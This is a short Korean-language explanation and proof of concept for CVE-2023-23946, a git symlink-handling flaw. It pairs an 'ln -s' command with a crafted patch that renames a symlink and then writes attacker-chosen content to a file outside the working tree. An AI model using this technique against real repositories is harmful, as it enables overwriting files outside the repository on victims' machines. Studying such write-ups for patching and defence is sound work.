
CVE-2023-23946에 대한 설명 및 PoC
CVE-2023-23946에 대한 설명 및 PoC
CVE-2023-23946 취약점은 git이 심볼릭 링크를 처리하는 방식의 결함으로 인해 발생합니다. git이 심볼릭 링크를 생성할 때 실제로 심볼릭 링크로 처리하지 않기 때문에, 이를 악용하여 작업 트리 외부의 파일을 가리키도록 할 수 있습니다.
ln -s [PATH_YOU_WANT_TO_ACCESS_OUTSITE_WORKING_TREE] symlink
diff --git a/symlink b/newsymlink
rename from symlink
rename to newsymlink
--
diff --git /dev/null b/newsymlink/spawn
new file mode 100644
index 0000000..e47f4ea
--- /dev/null
+++ b/newsymlink/[FILE_OUTSIDE]
@@ -0,0 +1 @@
+[WHAT_YOU_WANT_INSIDE_THE_FILE]
\ No newline at end of file
패치는 무엇을 하나요? 기존 심볼릭 링크의 이름을 변경하고 새 파일을 생성합니다. 이렇게 하면 /newsymlink/[FILE_OUTSIDE]를 수정할 때 git이 심볼릭 링크에 대한 보호를 적용하지 않습니다.